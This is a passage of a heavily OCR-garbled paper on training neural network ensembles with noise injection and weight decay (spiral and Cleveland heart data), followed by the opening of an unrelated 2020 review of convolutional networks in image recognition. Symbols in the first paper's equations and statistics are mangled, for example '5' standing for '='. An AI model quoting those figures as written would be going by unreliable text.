(right) fo r the corrup tion of noise to the data). A lthough the results look better than those with no weight decay, in the sense that the bo undaries look sm oother, they can still be im p roved by ave raging on a larger ensem ble of network s. T his is dem onstrated in the next section (Figure 2). T he effec t of averag ing is su mm arized in Figure 2. It can be seen that the 40-n et ensem b le ave raging resu lts, with no weight decay and no noise are better than the correspo nding ones wh en an ensemb le of ® ve nets is used (Figure 3). Sim ilarly, the results for an ensem ble of 40 netw orks trained w ith optimal w eight decay with no noise are better than the corresponding ® ve-n et ensem ble (Figure 4 (top left)). Finally, the com bination of weight decay, noise and 40-n et ensem ble clearly gives the best resu lts (F igure 2 (bottom right)). T hus, while earlier work suggested that a single-laye r feedfo rw ard network is not capable of capturing the structure in the spiral data, it is evident that a netw ork ensem ble with strong control over its capacity (via weight decay) wh ich is trained with h eavy noise can discover the h ighly non-linear structure of the p roblem. D ow nl oa de d by [ ] a t 03 :1 6 22 S ep te m be r 20 11 364 Y. R aviv & N . Intrator F igure 4. Effe ct of training with diffe rent noise levels on ® ve-n et ensem b le networks with w eight decay. N oise levels are as before, 0± 0.8 from top left to bo ttom right. 4.2. G eneralized Additive M odels In this section, w e take a diffe rent ap pro ach . Instead of analyzin g a method that has a hard tim e with the spiral data, we study a m odel that is very natural for it. W e apply b ootstrap ping to a generalized additive m odel (GA M ) (H astie & T ibshira ni, 1986, 1990) with a polyn om ial ® t of degree 1 on the sam e data. W e had to op tim ize the degree of the p olynomial and the span degree, which determ ines the sm oothness and the degree of locality of the estim ation. 3 D ue to these ef® cient controls, this ¯ exib le m odel is m uch more appro priate for the spiral data. F urtherm ore, this algorithm provides a unique m odel, i.e. fo r each set of param eters, there is no variab ility in the pro duced m odels as opp osed to the variab ility generated b y the random initial weights of a feedfo rw ard network. A ll of this su ggests that there sh ould b e no reason to bo otstrap with noise, sin ce the sm oothness and locality already can control the sm oothness of the boundary surface, and there seem s no reaso n to corrupt the data with unfam iliar noise. M oreover, there is no need to ave rage over several m odels sin ce there is no variab ility due to diffe rent local m inim a of the resu lting m odel. It is thus su rprisin g that even in this extreme case, boo tstrap ping w ith noise im p roved the generalization results. Figure 5 depicts the results fo r variou s degrees of noise added during training. It is clear that the b ootstrap im pro ves resu lts, and, fu rtherm ore, sm all valu es of the noise sharp en the resu lt. D ow nl oa de d by [ ] a t 03 :1 6 22 S ep te m be r 20 11 Bootstrapping w ith N oise 365 F igure 5. M odel estimation usin g G AM with b ootstrap. T en G A M p redictors are averag ed using boo tstrap sam p les with varying degree of noise. T here is no noise (and thus no averaging) at the top left resu lt. 5. C le velan d H eart D ata In this section, we analyze the Cleveland heart data ( D etrano et al., 1989), donated by D r R ob ert D etrano 4 to the U C I m ach ine-learning repository (M urphy & Ah a, 1992). Th is data concerns diagnosis of coronary artery disease and has been used in the past b y statisticians and by the m achine-le arn ing com m unity (B razdil & H enery, 1994; D etrano et al., 1989; G ennari et al., 1988; Stensm o, 1995). F urther data and pre-proc essin g details are given in Ap pendix B. Th e pre-processin g, which included rem oval of m issing valu es, sphe ring the data and creating dumm y variab les to replac e categorial variab les, resu lted in a dram atic im p rovem ent over p ast resu lts. M oreover, it revealed that in the new data representation, the structure is very linear since logistic regressio n was ab le to obtain a nine-fo ld cross-valid ation error of abou t 15.2% . A sim ilar error was obtained by usin g extensive pre-p rocessing and tem po ral-diffe rence reinforcem ent learn ing (Stensm o, 1995). Both resu lts are consistent w ith our fe edfow ard arch i- tecture results with no noise injection and are (as far as we know) the current best results on this data.5 It is thus a very challenging problem to N N s as deviation fro m linear structure is very sm all, 6 and highly non-lin ear estim ators su ch as C AR T , radial-basis fu nctions and K N N did not do so well on this data (B razdil & H enery, 1994). Th e prob lem is com plem entary to the spiral p roblem that w as consid ered before; there, we attem p ted to imp rove perform ance on a highly non-linear data which required a large cap acity network , while h ere we try to im prove p erform ance on a relatively linear pro blem using a sm all capacity network. In bo th cases, we sho w that noise cannot b e replac ed by network size or w eight-d ecay regularization and is essen tial fo r good perfo rm ance. D ow nl oa de d by [ ] a t 03 :1 6 22 S ep te m be r 20 11 366 Y. R aviv & N . Intrator F igure 6. R esults from logistic regressio n and fro m fe edforw ard networks w ith three hidden units and varyin g degrees of w eight decay. Left: Per cent classi® cation error. R igh t: R O C valu es. A ll results were obtained with nine-fold cross-v alidation on the C leveland heart data. In both graph s, the ® rst b oxplo t from the left represents the generalized linear m odel resu lts. F igure 6 su m m arizes m odel com p arison of resu lts b etween logistic regression and nine-fold cross-v alidation,7 with three hidden-u nit networks based on Riple y’ s N N ET pac kage described in Section 4.1. Train ing was stop ped after 400 epochs or earlier, base d on R ipley’ s conditions. T he network results w ere obtained by training ® ve networks on each of the nine-fo ld cross-valid ation sets and averaging their results. T hus, each classi® cation error is generated out of 45 networks. In each of the follow ing ® gures, the statistics were obtained from 12± 20 sim ilar runs differin g in ran dom initial conditions and cho ice of cross-valid ation sets fro m the data. Th e cross-valid ation code is base d on the p ublic dom ain version of T ibsh i- rani in Statlib. 8 Th e resu lts are su m m ariz ed by b oxplo ts 9 (H oaglin et al., 1983). Each bo xplo t is base d on 500± 900 sin gle network runs. A s the ratio betw een the two classes is differen t than one, classi® cation resu lts are not a very robu st m easure fo r m odel com pariso n, sin ce they are b ased on a single classi® cation thresh old. For exam ple, if one class represents only 10% of the data, then setting up the thresh old to 1 will result in a trivial classi® er that w ill prod uce zero regard less of the inp ut and w ill have only 10% error. T he receiver-ope rating characteristic (R OC ) (Good- enough et al., 1974; H anley & M cN eil, 1982) is freq uently used in su ch m odel com pariso ns, especially in clinical data (H enderson, 1993). This m easure has been used b y the contributor of the data (D etrano, 1989) and in assessing neural network perfo rm ance on other heart disease data (Lipp m ann et al., 1995). F igure 6 im plies that the p erform ance of N N s (w ithout noise injection) as m easu red by error rate and R O C valu es are slightly worse (not statistically signi® cant) comp ared with logistic regression , and cannot be im prove d by weight- decay regularization alone. F igure 7 sho ws the effect of noise injection fo r vario us levels of weight decay fo r an over-c ap acity arch itecture of nine hidden units. N oise levels in all the fo llowing graph s represent the SD of the zero-m ean G aussian noise. A lthough noise injection p roduces signi® cant im pro vem ent, the ab so lute valu es are su b- optim al sin ce the arch itecture is too large. N ote, how ever, that the R O C valu es fo r the 0.75 weight decay net are the highest comp ared with logistic regression D ow nl oa de d by [ ] a t 03 :1 6 22 S ep te m be r 20 11 Bootstrapping w ith N oise 367 F ig u r e 7 . In te g ra te d b ia s, v a ri a n c e a n d to ta l e rr o r fo r th e h e p a to m a d a ta se t. D ow nl oa de d by [ ] a t 03 :1 6 22 S ep te m be r 20 11 368 Y. R aviv & N . Intrator F igure 8. The effe ct of noise injection is dim inished wh en no w eight decay is used (com pare with Figure 9). A n op tim al architecture of three hidden units cannot prod uce good results w ithout weight decay. Left: Classi® cation error. R igh t: R O C valu es. (G LM 2 R OC 5 0.903 6 0.001, N N ET 2 RO C 5 0.91 6 0.002; t 5 1.766, degrees of fre edom (df) 5 21, P , 0.045; Z 5 1.691, P , 0.045) or with the optim al three hidden-unit network. W e have been usin g bo th the t-statistic (H ogg & C raig, 1970) and the Z-statistic of the W ilcoxon test (Lehm ann, 1975) wh ich uses a non-p aram etric ran k to test the differen ce in the m edians, as it is m ore rob ust to outliers. The R OC results suggest that the classi® cation error of this m odel could be im proved, po ssibly by averag ing over a larger num ber of network s. To see the perfo rm ance of noise injection alo ne, we present results of noise injection into zero weight-d ecay, op tim al architecture (Figure 8) and sho w that even under a low- cap acity architecture, w eight decay is essential to stabilize the system . O ptim al resu lts are p resented in F igure 9. W ith optim al w eight decay and architecture, addition of noise achieves results w hich are better than any other network, and better than logistic regression . M ean error of logistic regression was 15.27 6 0.18, m ean error for zero-no ise net w as 15.07 6 0.13 and m ean erro r fo r noise w ith SD 5 0.3 was 14.56 6 0.22. The diffe rence b etween the op tim al neural network and logistic regression is statistically signi® cant (t 5 2.196, df 5 26, F igure 9. R esults for the op tim al arch itecture network . Left: Classi® cation error. R ight: R O C values. N oise injection is h elpful and overall perform ance is optim al. D ow nl oa de d by [ ] a t 03 :1 6 22 S ep te m be r 20 11 Bootstrapping w ith N oise 369 P , 0.018; Z 5 2.14, P , 0.016) and the differen ce to zero noise is signi® cant as well (t 5 2.045, df 5 27, P , 0.025; Z 5 2.029, P , 0.021). T o our knowledge, these are the best resu lts on the C leveland h eart data. 6. D iscussion T he motivation to our ap proach com es fro m a key obse rvatio n regarding the bias/varian ce decom po sition of prediction error, nam ely the fac t that ensem ble averag ing does not affe ct the b ias portion of the error, b ut reduces the varian ce, wh en the estim ators on w hich averaging is done are independent. Th e level of noise affe cts the independency betw een the training sets, and thus the relative im p rovem ent of ensem ble averag ing. H owever, the level of noise also affec ts the quality of each predictor separately, increasing its varian ce by increasing the variab ility in the data. Th us, there sho uld b e an optim al level of the noise (it m ay not correspo nd to the true noise), which leads to optimal ensemb le p erfo rm ance. T his p erform ance can be fu rther im proved if the varian ce of individual networks can b e tem pered, e.g. with weight decay. W e have dem onstrated the effe ct of noise injection on prediction in three differen t cases. (i) H ighly non-linear (sp iral) data, usin g a non-appro priate m odel (as the data are alm ost rad ially sym m etric and the neural net is not). This required the use of an ensem ble of high capacity sin gle predictors and thus m ade the regularization task challenging. It w as show n that the excess varian ce of high cap acity m odels could only be effec tively trim m ed b y a com bination of all three com po nents: w eight decay, noise injection and ensem ble averag ing. (ii) H ighly non-lin ear (spiral) data with essen tially the p erfect m odel for it (G A M w ith locally linear units). Even in this case, w here regularization pro vides the perfect bias to the m odel, perform ance could be im pro ved by the comb ination. (iii) A highly linear prob lem , wh ere prac tically any network has excess capacity. T his case is a representative of a fam ily of clinical data sets, in which (linear) variab le selection was ap plied to h ighly dim ensional data and resulted in a highly linear low- dim ensional data structure. It was thus challenging to b e ab le to sh ow that the B EN algorithm is useful in this case, and can lead to im pro ved classi® cation results. P erform ance was also evalu ated based on the R O C m easure, as it is a stan dard m odel com parison tool fo r clinical data analysis. T he theoretical analysis su ggests that it is best to start with a very ¯ exible fu nction ap proxim ation techniq ue (e.g. a feedfo rw ard network with a large num ber of hidden units) and then control its capacity and sm oothness using noise and averag ing. O ur conclusio ns are not restricted to arti® cial neural network esti- m ation. W e sho w that sim ilar conclusions can be obtained when using a h ighly ¯ exib le G A M (H astie & Tibsh iran i, 1986). A cknow led gem ents Stim ulating discussion s with Leo B reim an, B rian R ipley and Chris B ishop are gratefully acknowledged. N otes 1. An exam ple of an identi® able m odel is (logistic) regression. 2. W here V ar ( f ) is de® ned by E X [( f X ( x ) 2 E X [ f X ( x )]) 2 ]. D ow nl oa de d by [ ] a t 03 :1 6 22 S ep te m be r 20 11 370 Y. R aviv & N . Intrator 3. In this case, the model amounts to a sum of locally linear functions around each of the training sam ples. 4. V A M edical C enter, L ong Beach and C leveland C linic Foundation. 5. Recent best result of 23.1% on non-norm alized data was obtained by a com pany that provides classi® cation w ith its ow n proprietary software (U D M , 1996). 6. This is a classical problem in clinical data in which variable selection w as done by a linear m ethod and therefore the data contains m ostly variables with linear structure. 7. This is a standard use; see, for exam ple, results under the STATL O G E SPRIT project (Brazdil & Henery, 1994). 8. http://www.stat.cm u.edu. 9. To read the boxplot: the white line in the m iddle of the box represents the m edian of the distribution; the grey box represents the inter-quartile range such that the bottom of the box is the ® rst quartile and the top is the third quartile; the dashed line and its terminating line represent plus and m inus 1.5 inter-quartile distance from the m edian; points lying outside this range are considered outliers, each such point is represented by a w hisker. 10. C an be obtained from M urphy and Aha (1992). R eferences Baum , E. & Lang, K. (1991) C onstructing hidden units using exam ples and queries. In R. P. L ippm ann, J. E . M oody & D . S. Touretzky (E ds), Advances in N eural Information Processing Systems, V ol. 3. San M ateo, C A: M organ Kaufmann, pp. 904± 910. Bishop, C .M . (1995) Training w ith noise is equivalent to Tikhonov regularization. N eural C omputation, 7, 108± 116. Brazdil, P. & Henery, R. (1994) Analysis of results. In D . M ichie, D . J. Spiegelhalter & C . C . Taylor (E ds), M achine Learning, N eural and Statistical C lassi® cation. N ew York: Ellis H orwood, pp. 175± 212. Breim an, L. (1994) Bagging Predictors. Technical Report TR-421, D epartm ent of Statistics, U niversity of C alifornia, Berkeley, C A. D effuant, G . (1995) An algorithm for building regularized, piecewise linear discrimination surfaces: the perceptron m embrane. N eural Computation , 7, 480± 489. D etrano, R. (1989) Accuracy curves: An alternative graphical representation of probability data. Journal of Clinical Epidem iology, 42, 983± 986. D etrano, R., Janosi, A., Steinbru nn, W ., P ® sterer, M ., Schm id, J., Sandhu, S., Guppy, K ., Lee, S. & Froelicher, V. (1989) International application of a new probability algorithm for the diagnosis of coronary artery disease. Am erican Journal of C ardiology, 64, 304± 310. E fron, B. & Tibshirani, R. (1993) An Introduction to the Bootstrap. N ew York: C hapm an and H all. Fahlm an, S.E . (1989) Fast-learn ing variations on back-propagation: An empirical study. In D . T ouretzky, G . H inton & T. Sejnow ski (E ds), Proceedings of the 1988 Connectionist M odels Summ er School. San M ateo, C A: M organ K aufmann, pp. 38± 51. Fahlm an, S.E. & Lebiere, C . (1990) The Cascade-C orrelation L earning Architectu re. C m u-cs-90-1 00, C arnegie M ellon U niversity, Pittsburgh, PA. G em an, S., Bienenstock, E . & D oursat, R. (1992) N eural networks and the bias-variance dilem m a. N eural C omputation, 4, 1± 58. G ennari, J.H ., L angley, P. & Fisher, D . (1988) M odels of incremental concept formation. Arti® cial Intelligence, 40, 11± 61. G oodenough, D .J., Rossm ann, K . & L usted, L.B. (1974) Radiographic applications of receiver operating characteristic (RO C ) curves. Radiology, 110, 89± 95. Hanley, J.A. & M cN eil, B.J. (1982) The m eaning and use of the area under a receiver operating characteristic (RO C ) curve. Radiology, 143, 29± 36. Hansen, L.K . & Salamon, P. (1990) N eural networks ensem bles. IEEE Transactions on Pattern Analysis and M achine Intelligence, 12, 993± 1001. Hastie, T. & Tibshirani, R. (1986) Generalized additive m odels. Statistica l Science , 1, 297± 318. Hastie, T. & Tibshirani, R. (1990) Generalized A dditive M odels. London: C hapm an and H all. Henderson, A.R. (1993) Assessin g test accuracy and its clinical consequences: a prim er for receiver operating characteristic curve analysis. Annals of C linical Biochem istry, 30, 521± 539. Hoaglin, D .C ., M osteller, F. & T ukey, J.W . (1983) U nderstand ing R obust and Exploratory D ata Analysis. N ew York: W iley. Hogg, R.V. & C raig, A.T. (1970) Introduction to M athem atical Statistics (3rd edn). T oronto, C anada: M acm illan. D ow nl oa de d by [ ] a t 03 :1 6 22 S ep te m be r 20 11 Bootstrapping w ith N oise 371 K rogh, A. & H ertz, J.A. (1992) A sim ple weight decay can improve generalization. In J. E. M oody, S. J. Hanson & R. P. Lippmann (Eds), Advances in N eural Information Processing Systems, Vol. 4. San M ateo, C A: M organ K aufm ann, pp. 950± 957. L ang, K .J. & W itbrock, M .J. (1988) Learning to tell two spirals apart. In D . S. Touretzky, J. L . E llman, T . J. Sejnowski & G. E. Hin ton (E ds), P roceedings of the 1988 Connectionists M odels, pp. 52± 59. L ehm ann, E.L. (1975) N onparametrics: Statistical M ethods Based on Ranks. San Francisco, C A: H olden and D ay. L ippm ann, R.P., K ukolich, L . & Shahian, D . (1995) Predicting the risk of com plications in coronary artery bypass operations using neural networks. In G. T esauro, D . Touretzky & T. L een (Eds), A dvances in N eural Information P rocessing System s, V ol. 7. C ambridge, M A: M IT Press, pp. 1055± 1062. M urphy, P.M . & Aha, D .W . (1992) UC I Repository of m achine learning databases. D epartment of Information and C om puter Science, U niversity of C alifornia at Irvine. Perrone, M .P. (1993) Improving Regression Estim ation: Averagin g M ethods for Variance Reduction with Extension s to General C onvex M easure Optim ization. PhD thesis, Brow n U niversity, Institute for Brain and N eural Systems, Providence, RI. Ripley, B.D . (1996) Pattern Recognition and N eural N etworks. O xford Press. Sietsma, J. & D ow, R.J.F. (1991) C reating arti® cial neural netw orks that generalize. N eural Networks, 4, 67± 79. Stensmo, M . (1995) Adaptive Autom ated Diagnosis. PhD thesis, Royal Institute of Technology, Stockholm , Sw eden. U ltragem D ata M ining (U D M ) (1996) Esprit Statlog Benchm arks. Technical Report, Boulder C reek, C A. W olpert, D .H . (1992) Stacked generalization. N eural N etworks, 5, 241± 259. A pp end ix A: The Sp ira l D ata T he two-dim ensional spiral data10 (Lang & W itbrock, 1988) are given b y a vector ( x i , y i ) de® ned by: x i 5 r i cos ( a i 1 k p /2), y i 5 r i sin ( a i 1 k p /2) (A 1) wh ere a i 5 p i /16, r i 5 0.5 1 i /16, i 5 0, . . . , 97 (A 2) and k 5 1 fo r one class and 3 fo r the other class. A pp end ix B: D etails a nd Pre-pro cessing of the C le velan d H eart D a ta T he data in the U C I repo sitory contain 13 variab les out of abo ut 70 that were in the original study. T he task is to predict the existence of a coronary artery disease (C AD ) based on the m easurem ents. D ata fo r 303 p atients were obtained; 44% of the patients were diagnosed with C A D . T he variabl e attributes are: (1) A ge (2) Sex (3) Chest p ain typ e (4 valu esÐ converted to 3 binary variab les) (4) Resting bloo d pressu re (5) Serum cholesterol in m g dl 2 1 (6) Fasting bloo d su gar . 120 m g dl 2 1 (7) Resting electrocardiograp hic resu lts (values 0, 1, 2) (8) M axim um h eart rate achieved (9) Exercise-induced angina (10) Oldpeak 5 ST depressio n induced b y exercise relative to rest D ow nl oa de d by [ ] a t 03 :1 6 22 S ep te m be r 20 11 372 Y. R aviv & N . Intrator (11) The slo pe of the peak exercise ST segm ent (converted to 2 binary variab les) (12) N um b er of m ajor vesse ls (0± 3) coloured by ¯ ouroscopy (converted to 3 binary variables) (13) Thal: 3 5 norm al; 6 5 ® xed defect; 7 5 reversible defect (converted to 2 binary variables) W e h ave added dum m y variab les to replace the categorial and ordinal variab les fo r variab les 3, 11, 12 and 13 and therefore w orked with 19 independent variab les. T he continuous variabl es 1, 4, 5, 8 and 10 were sph ered (standard ized) by setting the m ean of each of the variabl es to zero w ith unit varian ce. This step was necessary as the data contain variab les that are on differen t scales, su ch as age and bloo d pressu re. The original data contain 76 attributes and h ave m any m issing valu es. The data used in most of the b enchmarks have only 13 attributes and a fe w m issin g valu es wh ich we sim p ly replaced by their unconditional expectations. Th e addition of dumm y variab les and data sp hering had a dram atic effe ct on the classi® cation resu lts. D ow nl oa de d by [ ] a t 03 :1 6 22 S ep te m be r 20 11 work_o7rrr6k3uzbx5cpynca7plmmwy ---- International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 DOI: 10.21307/ijanmc-2020-014 31 Research on the Application of Convolutional Neural Networks in the Image Recognition Gu Hongxian 1. School of Computer Science and Engineering Xi'an Technological University Xi’an, 710021, China 2. State and Provincial Joint Engineering Lab of Advanced Network, Monitoring and Control Xi’an, 710021, China E-mail:15757118020@163.com Liu Bailin 1. School of Computer Science and Engineering Xi'an Technological University Xi’an, 710021, China 2. State and Provincial Joint Engineering Lab of Advanced Network, Monitoring and Control Xi’an, 710021, China E-mail:498194312@qq.com Gao Zhiyu School of Computer Science and Engineering Xi'an Technological University Xi’an, 710021, China E-mail:516750613@qq.com Mu Jing School of Computer Science and Engineering Xi'an Technological University Xi’an, 710021, China E-mail:55897293@qq.com Abstract—Over the past few years, benefits from the strong feature extraction advantages of Convolutional Neural Networks (CNN)themselves and the efforts and applicationby researchers making, research work on CNN in the field of image recognition has yielded many results and achieved the best performance in classification and regression tasks. This paper focuses on the improvement and application history ofCNNand summarizes the direction of improvement and optimization of CNN in recent years from the perspective of the structure of CNN themselves and their applications in various fields. Finally, this review is summarized with a further outlook on the development direction of CNN. Keywords-Image Recognition; Deep Learning; Machine Learning; Convolutional Neural Networks I. INTRODUCTION Since the concept of deep learning was proposed by Hinton et al[1]. In 2006, during more than a decade of development, machine learning is closer to the original goal of "artificial intelligence". Deep learning is a hierarchical machine learning approach that involves multiple levels of nonlinear transformations that learn the inherent laws and representation levels of sample data, and the feature information obtained in the process of learning can help the machine achieve analytical judgments about the data. Compared to traditional machine learning methods, it has achieved good results in search technology, image recognition, machine translation, natural mailto:15757118020@163.com mailto:498194312@qq.com mailto:55897293@qq.com International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 32 language processing, multimedia learning, speech, recommendation and personalization technologies. With the practice of researchers in various fields, many network models have been proposed, such as DBN (Deep Belief Network), CNN (Convolutional Neural Network), RNN (Recursive Neural Network), etc. The introduction of CNN into the field of image recognition has taken researchers a long time to explore and practice. Image recognition technology originated in the 1940s, when it was not rapidly developed due to inadequate technology and inadequate hardware facilities. It was not until the 1990s that artificial neural networks combined with support vector machines(SVM) facilitated the development of image recognition technology, which was widely used. However, traditional image recognition techniques are based on shallow structural models, which require human pre-processing of the image, resulting in reduced accuracy of image recognition. As computer hardware levels and GPU evolved, researchers began to work on deeper models of network structure, and in 2012, Krizhevsky et al. reduced the error rate of the tested Top-5 to 15.3% in ImageNet's large-scale visual recognition challenge competition based on CNN, 10.9% lower than the error rate of the second-place team's Top-5, showing the great potential of deep models. In the following years, CNN have made leaps and bounds in digital image recognition and processing with their powerful feature extraction capabilities. II. OVERVIEW OF CNN CNN, compared to other network models, are better able to adapt their structures to image structures while extracting features and classifying them, with outstanding performance in image processing. In addition, its weight sharing feature educes the training parameters of the network, which makes the network structure simple and more generalizable, and has become a current research hotspot. A Development history The prototype of the CNN is the BP algorithm proposed by Rumelhart in 1986[2].In the 1990s, Lecun proposed the LeNet-5 model[3], which was mainly applied to image classification of handwritten numbers, used the stochastic gradient descent method and reverse propagation method for supervised training of the CNN, and achieved the best recognition results on the MNIST dataset[4], laying the foundation of modern CNN In 2006, Hinton proposed the concept of deep learning in his paper and pointed out that multi-cryptic neural networks have better feature learning capabilities and their complexity in training can be effectively mitigated by layer-by-layer initialization[1]. In the next few years, the development of CNN has also had some achievements, thanks to the substantial update of computer hardware devices and the rapid development of GPU.In 2012, the ImageNet competition, the model based on CNN took the first place with a 10% accuracy rate higher than the second place, and was once again pushed to the deep research boom by scholars.In 2014, the Computer Vision Group of Oxford University and Google DeepMind jointly developed VGGNet[5], and won the first and second place in the ImageNet competition respectively.In 2015, Kaiming He et al. proposed the residual neural network ResNet[6], which solves the problem of deep networks being difficult to train by fitting the residual term with cross-layer connections.Although the number of network layers reaches 152, the complexity is lower and the Top-5 error rate on ImageNet is only 3.57%. B Basic structure and working principle The basic building blocks of a CNN are also neurons one by one, containing weights with learning abilities and paranoid term constants. When multiple neurons are combined with a hierarchical structure, a neural network model is formed. A figurative representation of both is shown in Figure 1. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 33 (a) Neurons (b) Neural networks Figure 1. Neurons and neural networks. CNNmodels, are neural network modelsthat contain feature extractors consisting of convolutional and pooled layers. A typical network structure is shown in Figure 2, which includes five parts: input layer, convolution layer, pooling layer, full connection layer, and output layer. Among them, the convolutional layer and the pooling layer are the core modules to realize the feature extraction function of convolutional neural networks. Figure 2. Typical structure of a CNN CNN is a multilayered supervised learning neural network structure with the following workflow: A series of pre-processing operations are performed on the data at the input level, such as data normalization, de-normalization, etc. Entering the convolutional layer, the image of the input layer is convolved with a convolutional nucleus, and then the activation function outputs a feature extraction diagram of the layer, which is expressed as (1). ∑ (1) Wherein, represents theactivation function, represents the set of images participating in the current convolutional layer operation, represents the value of a certain pixel input to the current layer image, represents the convolutional operation, represents the weight vector of the l layer convolutional nucleus, and represents the paranoid term of the l layer. Currently the commonly used activation functions are: Sigmod function, Tanh function, ReLU function, etc[7]. Connecting the pooled layer after the convolutional layer allows a certain degree of feature invariance and can reduce the amount of data. The input feature map is split into non-overlapping regions in the layer, and for each subregion features are further extracted by pooling operations, the common pooling operations being average pooling and maximum pooling. After a number of alternating convolutional and pooling layers, multiple sets of highly abstracted feature maps are obtained; then the fully connected layers are entered and the multiple sets of feature maps are combined into one feature map. Then based on business needs, the final output of classification or identification results. The goal of training is to minimize the loss function of the network, so the weights and biases of each layer need to be constantly updated during the training. Common loss functions are Mean Squared Error (MSE) function, Negative Log Likelihood (Negative LogLikelihood, NLL) function, etc. In practice, in International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 34 order to reduce the occurrence of overfitting, the loss function increases the L2 parametre to control the overfitting of the weights and the parameters to control the strength of the overfitting effect.  (2) The weights and biases were updated as (3) and (4). (3) (4) C Significance of the study CNNhave been so successful in a number of applications and researchers have moved on to other areas, which brings more challenges. In terms of the CNN itself, that's where the research comes in. 1) Refinement of the theoretical system through domain application effects. CNN have undergone more than 70 years of bumpy development, from MP models, BP neural networks, to various deep learning networks that are popular nowadays, all of them are judged directly by experimental effects, and there has been no complete set of theories for mathematical verification of these methods. Thus, as the field of application of CNN expands, it will also promote theoretical research in the field of CNN to a certain extent. 2) Facilitate the optimization of neural network structures and extend their application value. At present,CNN have a place in natural language processing, image recognition, speech processing and other fields, and theirtrend is positive. And the network still has the problem of gradient disappearance, training sample size limit, computing power limit, is the short board of its development. For the problem that networks are difficult to train, an analysis of the problems related to network training is also given in the literature[8], but the solutions given have not become mainstream. Therefore, there is an urgent need to improve the learning capabilities of deep neural networks, so that the networks have better generalization capabilities and can be adapted to more complex application scenarios. III. IMPROVEMENT AND OPTIMIZATION OF CNN In recent years, improvements in CNN have been driven primarily by factors such as final detection effectiveness, network operating efficiency, and computational complexity. As of now, the improvement and optimization of CNN are mainly considered in three aspects: network depth, network structure, and network training methods. A Network depth Lecun et al. designed the Lenetnetwork[9], which uses alternately connected convolutional and pooled layers, and eventually passes through full-connected layers.There is 5 layers in Lenet and Lenet became the originator of CNN.In 2012, Krizhevsky proposed AlexNet[10], a network model with five convolutional layers, some of which are followed by a pooled layer for downsampling and finally two fully connected layers. The last layer is the softmax output layer, with 1000 nodes, corresponding to 1000 image classifications in the ImageNet graph set and using the Dropout mechanism and ReLu function, which has improved the accuracy and training time. Subsequently, the VGGnet proposed by Karen et al. uses almost all 3 ×3 convolutional nuclei, while adding pooled layers after several convolutional layers, instead of pooling immediately after each convolutional layer, to guarantee the depth of the network in many ways.VGGnet[11]demonstrated that increasing the number of network layers is beneficial for improving the accuracy of image classification. This increase is not unlimited and too many layers can create network degradation problems. The number of layers that affect the test results VGGnet was finally determined in two International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 35 versions, 16 and 19 layers. In the following years, there were different teams of researchers who proposed GoogleNet (22 layers), ResNet (152 layers) and they all deepened in terms of network depth and got better and better. In terms of network depth alone, increasing the network level has an effect on the learning effect of convolutional neural networks, which also confirms the need for deeper learning. B Improvements of the network structure Improvements to the network structure mainly revolve around the idea of reducing network complexity. In 2014, Google proposed GoogLeNet[12], whose main innovation is the Inception mechanism, which sets up different convolutional cores in the same layer, i.e., multi-scale processing of images, and adding 1*1 convolutional core before 3*3, 5*5 for dimensionality reduction, which reduces parameters and improves the accuracy of image recognition on ImageNet datasets by about 10%.In 2015, Springenberg J T et al. proposed a full convolutional structure in literature[13]. Instead of the classical pairing of alternating convolutional and pooled layers in a classical convolutional neural network, the stride convolutional layer is used instead of the feature extraction layer in this structure. It was found that the error rate of this new network structure was reduced by 10 percentage points compared to traditional convolutional neural networks, and it was found that in some cases, the addition of apooling layer to this network structure resulted in weakened performance. Lin M et al. proposed a network-in-network structure in the literature, Network In Network[14]. is a subversion of the traditional structure of convolutional neural networks. The mesh structure replaces the full connection layer with a global averaging pooling layer, allowing the input feature map to be classified directly at the output, improving performance. However, this structure makes the convergence process longer and, on the whole, is not a very effective network structure. The Google DeepMind team proposed a self-contained transformation module to flexibly and efficiently extract image invariant features[15], the specific structure of the module is shown in Figure 3, the model named Spatial Transformer is mainly composed of three parts: Localization Network, Grid generator and Sam-pler. Localization Network uses input feature mapping and outputs spatial transformation parameters through multiple implicit layers; Grid generator uses predictive transformation parameters to create sampling grids; Sampler uses feature mapping and sampling grid as inputs to generate output mapping from grid points. Figure 3. Invariant image feature This model is used to good effect: it is a self-contained module that can be added anywhere in the network structure (not just the CNN), and there are no limits. It is easy to differentiate and can be used directly for end-to-end training. Its easy-to-differentiate and fast nature allows it to be added to the structure without slowing down the original network. The features extracted by this method are more common than the conventional structures. Shanshan Xu[16] proposed an algorithm for progressively extending the network structure of a convolutional neural network to optimally adjust the network structure to make the network suitable for real-world problems, and at the same time proposed an improved feature extraction method to realize that feature extraction does not occur on its own in the network, and applied this method to handwritten number recognition, and the experimental results International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 36 showed that the recognition accuracy and recognition efficiency were higher than other algorithms using the classification method of convolutional neural networks. C Methods of network training 1) The dropout mechanism[17] was added to the eliminate overfitting. The Dropout proposed by Hinton et al. effectively improves the generalization performance of the network by randomly ignoring a certain percentage of node responses during training compared to traditional fully connected neural networks. However, the performance improvement of Dropout for convolutional neural networks is not significant, mainly because convolutional neural networks greatly reduce the number of training parameters compared to fully connected networks due to the weight sharing properties of convolutional nuclei, which itself avoids the more severe overfitting phenomenon. Based on the idea of Dropout, Wan et al[18]proposed the Drop Connect approach. Unlike Dropout which ignores some of the node responses of the full connection layer, Drop Connect randomly disconnects a certain percentage of the neural network convolutional layer. Forconvolutional neural networks, Drop Connect, which acts on the convolutional layer, has a much stronger past-fitting capability than Dropout, which acts on the full-connect layer. Although the functional layer of Dropout and Drop Connect are different, the underlying principle is to increase the sparsity or randomness of network connections in network training in order to eliminate overfitting and improve network generalization capabilities. 2) Training methods using knowledge transfer Overfitting and gradient dispersion are prone to occur when training against conventional convolutional neural networks. A training strategy using knowledge migration was proposed by Rocco et al. in the literature[19]. Pre-training (Pre-training with soft target, PST) is first performed on the soft target (soft target is a class distribution containing information between sample classes), and the migration of the soft target from the source model to the target model in the same domain allows more supervisory information to be obtained from a limited sample than from a single tag, solving the problem of missing samples. Then the target model adjacent convolutional layer is divided into a module to learn the low-level features of the source model in a modular way, similar to DBN's layer-by-layer pre-training strategy, and the combination of MMT and PST, the sample class information and low-level features of the two knowledge migration at the same time, so that the model convergence to a better position, and then use the SGD algorithm 